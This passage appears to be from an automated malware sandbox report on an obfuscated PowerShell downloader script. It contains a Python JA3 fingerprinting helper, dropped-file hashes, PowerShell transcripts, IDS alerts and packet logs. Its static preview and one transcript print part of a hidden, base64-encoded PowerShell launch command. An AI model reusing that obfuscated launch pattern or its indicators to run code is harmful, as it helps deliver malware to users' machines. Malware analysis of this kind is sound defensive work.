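            etype, elen = struct.unpack(">HH", hs[pos:pos + 4]); pos += 4
            data = hs[pos:pos + elen]; pos += elen
            ext_types.append(etype)
            if etype == 10:                           # supported_groups: u16 length + u16 ids
                (n,) = struct.unpack(">H", data[:2])
                groups = [struct.unpack(">H", data[i:i + 2])[0] for i in range(2, 2 + n, 2)]
            elif etype == 11:                         # ec_point_formats: u8 length + u8 ids
                formats = list(data[1:1 + data[0]])

    def field(values):
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([str(version), field(ciphers), field(ext_types),
                     field(groups), field(formats)])


def ja3_hash(record):
    """JA3 fingerprint: MD5 of the JA3 string, as in the report's JA3 column."""
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


# Constructed ClientHello: TLS 1.2 version field, one GREASE cipher plus three
# real ones, and GREASE + SNI + supported_groups + ec_point_formats +
# signature_algorithms extensions. Not a capture from the sandbox run.
SAMPLE_EXTENSIONS = [
    (0x0A0A, b""),                                    # GREASE extension
    (0, b"\x00\x0c\x00\x00\x09localhost"),            # server_name
    (10, b"\x00\x06\x0a\x0a\x00\x1d\x00\x17"),        # groups: GREASE, x25519, secp256r1
    (11, b"\x01\x00"),                                # point format: uncompressed
    (13, b"\x00\x04\x04\x03\x08\x04"),                # signature_algorithms
]
SAMPLE_HELLO = build_client_hello(0x0303, [0x0A0A, 0x1301, 0xC02B, 0xC02F], SAMPLE_EXTENSIONS)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))                   # 771,4865-49195-49199,0-10-11-13,29-23,0
    print(ja3_hash(SAMPLE_HELLO))
```

A JA3 fingerprints the TLS client stack, not the script driving it: the same procedure applied to the sandbox's capture yields the 3b5074b1b5d032e5620f69f9f700ff0e listed above for the .NET/SChannel client inside powershell.exe, which is why the table pairs it with unrelated executables. Treat it as a weak pivot on its own and combine it with the contacted hosts and URL paths before blocking on it.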

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1391
Entropy (8bit): 7.705940075877404
Encrypted: false
SSDEEP: 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5: 0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1: CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256: 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512: 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious: false
Reputation: low
                                            Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Microsoft Cabinet archive data, 59863 bytes, 1 file
Category: dropped
Size (bytes): 59863
Entropy (8bit): 7.99556910241083
Encrypted: true
SSDEEP: 1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
MD5: 15775D95513782F99CDFB17E65DFCEB1
SHA1: 6C11F8BEE799B093F9FF4841E31041B081B23388
SHA-256: 477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
SHA-512: AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
Malicious: false
Reputation: moderate, very likely benign file
                                            Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 192
Entropy (8bit): 2.7633865340992063
Encrypted: false
SSDEEP: 3:kkFklveQp9vfllXlE/zMcp1lhlXNNX8RolJuRdyo1dlUKlGXJlDdt:kK5Qk1hRNMa8Rdy+UKcXP
MD5: 4E5ECF91FA69686F361D7CC07E3D6582
SHA1: ECAFA212690044EBFE1D65C951B69E0C62B8E024
SHA-256: 70BA421E61DED79AA08B0EABD03A9D4BEB2CE8EC6483652D861B5417D1EC12DF
SHA-512: C99204682F35AEC3E2F8DAA944788A20D308513177F63D3FE8CC9299570591B576A000A948A15EE9CADA455103787748F52BC77022F051AA8D592A830013342D
Malicious: false
Reputation: low
                                            Preview: p...... ........\;.s9L..(....................................................... ..........~...L...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1311944695345195
                                            Encrypted:false
                                            SSDEEP:6:kKrGpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:DGphZkPlE99SNxAhUeSKO
                                            MD5:6AC4AA25A8648DAA545A3A84A25E9AAD
                                            SHA1:BB16BACC25BE0625F1D3B151EA8E2D7AFF37CA9F
                                            SHA-256:3F4FBF2A712326719D80FABEC044640324A7C0796B7F21EC359B527BD00CFC10
                                            SHA-512:89CEF3B3991ED130FA1BBB39C484C6550517618DB0BE703BBB1C4147961DBC50463C507A33E4F3D360AD104B6193DD3E8E39AD3A0F5588E9A03987C2912DDF84
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ..........2s9L..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11606
                                            Entropy (8bit):4.883977562702998
                                            Encrypted:false
                                            SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                            MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                            SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                            SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                            SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.9260988789684415
                                            Encrypted:false
                                            SSDEEP:3:Nlllulb/lj:NllUb/l
                                            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: @...e................................................@..........
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccvww3n.ra1.psm1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cif5usda.lst.psm1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f411yxfc.nkz.ps1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoooqw21.rs0.ps1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KDKQ2HJQ1S8JAB2CTX7V.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6205
                                            Entropy (8bit):3.762755610434832
                                            Encrypted:false
                                            SSDEEP:48:I4guyRRdrqyeCGUHfS81jpukvhkvklCywhNH2oG8O8SogZoqMn2oG8O8SogZoqoH:InuQHUC//51ckvhkvCCthdsdHl6sdHlA
                                            MD5:44C2D8832C9B26D73DE4A3BB5930C2A0
                                            SHA1:51864FF5C454B7107990364233395C42A252633F
                                            SHA-256:9E4298EEF350886F9484DC76778CAD5161771D0D4EE8C12926933A072CC22C67
                                            SHA-512:7529E93335318C2226FC94122CBC3A43A00A41B116A0D1B377233E7D2B43AA46039DC22C4C0D25DABFC95DB789CB7A6081313292FA00568CC67C4648C6BB5928
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-......:...v.W.8L......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..R.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..R.......Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..R.......Y........................M.i.c.r.o.s.o.f.t.....V.1.....>Qzx..Windows.@.......Ny..R.......Y....................8&..W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny.>Q\x.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny.>Q\x.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.>Q.v.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                            C:\Users\user\Db_bh30\Yf5be5g\A69S.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:HTML document, UTF-8 Unicode text, with very long lines
                                            Category:dropped
                                            Size (bytes):34984
                                            Entropy (8bit):4.240349685093522
                                            Encrypted:false
                                            SSDEEP:384:LTSMdrzMBhk+cmk38om5Z47TVycSDr29OfBaJUvwu:LTSezMXcmk3Lm5ZQw2wQJUvj
                                            MD5:8352EEA6112690CAC9E09BE2F73B8CA0
                                            SHA1:CCC67058161690D974019A39E4C6171D5A218B29
                                            SHA-256:0EF085D3879AECCC1B08BFE936D1043508B0B607E5CCEA464876ABD64C4B3EEC
                                            SHA-512:75F33CFDCA859F9E5DEB98B187A3B1525D96638632D96F91365695E31E45F1A6F038E68FABA3BDE8F91A9268EF69285DF748BAAAD9192F81F6024C1377C2E4F1
                                            Malicious:false
                                            Preview: <!DOCTYPE html>.<html lang="br">..<head>. Required meta tags -->. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">. <title>Aumente as Vendas de Sua Loja Virtual com Intelig.ncia Artificial - HintUP</title>. Meta Share -->. <meta property="og:title" content="Aumente as Vendas de Sua Loja Virtual com Intelig.ncia Artificial - HintUP" />. <meta property="og:site_name" content="HintUP" />. <meta property="og:url" content="https://hintup.io" />. <meta property="og:locale" content="pt_BR" />. <meta property="og:description" content="Finalmente uma forma autom.tica e de r.pida instala..o para que a sua loja apresente os produtos que o seu visitante procura! Experimente! Entre em contato pelo WhatsApp: (19)99508-8264" />. <meta property="og:type" content="website" />. <meta property="og:image" content="https://www.hintup.io/images/og_image_diffstuff.png" />. <meta property="og:i
                                            C:\Users\user\Documents\20210518\PowerShell_transcript.888683.6JGJzLrn.20210518155332.txt
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1204
                                            Entropy (8bit):5.114576395356746
                                            Encrypted:false
                                            SSDEEP:24:BxSAkxvBnnDx2DOXUW6YTUWSHjeTKKjX4CIym1ZJXDvBaLAoEZnxSAZV:BZ4vhDoORzSqDYB1Z5cE9ZZV
                                            MD5:FC86114C26D2C38E6D651DC6E21392C4
                                            SHA1:FEB47BC311D57B402ECF481AEB670B9DF2C9B9BA
                                            SHA-256:A499F1FF88F99B06FBF5A2CFCD4D13F69860EDAF4E79246C3272CB905CE516EA
                                            SHA-512:221184E25D49C28E5028080B6CCB413A376E98F2687A9F75BDBDD1610DD4C91527D35312444DC60BD0C47EA2C196D302118D6D1E45E5E599206F72111652434C
                                            Malicious:false
                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210518155332..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\ps_script.ps1..Process ID: 5496..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210518155333..**********************..PS>CommandInvocation(ps_script.ps1): "ps_script.ps1"....Mode LastWriteTime Length Name..---- ------------- ------ ----..d----- 5/18/2021 3:53 PM Yf5be5g..*********
                                            C:\Users\user\Documents\20210518\PowerShell_transcript.888683.lI0ZHqTi.20210518155333.txt
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8455
                                            Entropy (8bit):5.245692737440784
                                            Encrypted:false
                                            SSDEEP:192:R3srxVVvCpLhftkK7x/nhe8r88O9KGbQREx:YbCKk1nhb8YGbQQ
                                            MD5:53877639E6807BFF09BF8660AA798523
                                            SHA1:8F9BB6C70B6D0E6F1F2B442DE34ABDF632C3D783
                                            SHA-256:D2C4E9A1AE4E1EA18F4DCA3B7982D2218499FF5F1F734E07A9372A34096A0FFC
                                            SHA-512:D1A773B91E8D24174B16429A088226C10955E8F5A666E63D4A14F0C8BB221407991FCBD6B9696CC1864711A77FE002B7BBC6C7251DF0C9C7B5C7B84486E0A516
                                            Malicious:false
                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210518155334..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -ENCOD 

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines, with no line terminators
                                            Entropy (8bit):4.173149426744133
                                            TrID:
                                              File name:ps_script.ps1
                                              File size:5397
                                              MD5:afce2bf94f95c17bc64535f2a70a96d0
                                              SHA1:eb88e2f97a2292d63d678963813a1999f69faa45
                                              SHA256:9edaa045dc625024afee6ac6fd532fdb27d6beb607588c326babdba0b439d602
                                              SHA512:e2e6df35fd33f5c7cad7b688346b541ca346997a4193012719ecca3ecde34fde4a0e76d122ba3ad9f65273939d4324fc5200f8b98c809761664560f5bec752c8
                                              SSDEEP:96:Gm3srxVTZ73viiaL77C/IH3bbY+ft9v8T+uC9PzmGFBJ1hes5:v3srxVVvCpLhftkK7x/nhx
                                              File Content Preview:POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIA

                                              File Icon

                                              Icon Hash:72f2d6fef6f6dae4

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              05/18/21-15:53:38.350147 | ICMP | 486 | ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited | | | 216.127.164.209 | 192.168.2.3
                                              05/18/21-15:53:41.348106 | ICMP | 486 | ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited | | | 216.127.164.209 | 192.168.2.3
                                              05/18/21-15:53:47.368138 | ICMP | 486 | ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited | | | 216.127.164.209 | 192.168.2.3

                                              Network Port Distribution

                                              TCP Packets

                                              May 18, 2021 15:54:01.432229996 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.432282925 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451366901 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451427937 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451467037 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451502085 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451507092 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451550007 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451565981 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451590061 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451628923 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451643944 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451668978 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451713085 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451718092 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451764107 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451803923 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451817989 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.451847076 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.451908112 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.481348991 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.482697964 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482741117 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482769966 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482796907 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482825041 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482851982 CEST4434973335.214.199.246192.168.2.3
                                              May 18, 2021 15:54:01.482856989 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.482878923 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.482887983 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.482893944 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.482908964 CEST49733443192.168.2.335.214.199.246
                                              May 18, 2021 15:54:01.687733889 CEST4973680192.168.2.3162.241.148.243
                                              May 18, 2021 15:54:01.846489906 CEST8049736162.241.148.243192.168.2.3
                                              May 18, 2021 15:54:01.846674919 CEST4973680192.168.2.3162.241.148.243
                                              May 18, 2021 15:54:01.846805096 CEST4973680192.168.2.3162.241.148.243
                                              May 18, 2021 15:54:02.005379915 CEST8049736162.241.148.243192.168.2.3
                                              May 18, 2021 15:54:02.030893087 CEST8049736162.241.148.243192.168.2.3
                                              May 18, 2021 15:54:02.114664078 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:02.168781042 CEST4973680192.168.2.3162.241.148.243
                                              May 18, 2021 15:54:02.428581953 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:02.428790092 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:02.428850889 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:02.744891882 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:07.031276941 CEST8049736162.241.148.243192.168.2.3
                                              May 18, 2021 15:54:07.031390905 CEST4973680192.168.2.3162.241.148.243
                                              May 18, 2021 15:54:16.140671015 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140695095 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140713930 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140728951 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140759945 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140808105 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:16.140852928 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140872002 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:16.140904903 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:16.228303909 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:18.148736000 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148777962 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148802042 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148828030 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148852110 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:18.148854971 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148879051 CEST804973745.116.14.210192.168.2.3
                                              May 18, 2021 15:54:18.148881912 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:18.148930073 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:18.240895987 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.282344103 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.282526970 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.283096075 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.324299097 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.328485966 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.328510046 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.328572989 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.341016054 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.382236004 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.382647991 CEST44349738172.67.223.27192.168.2.3
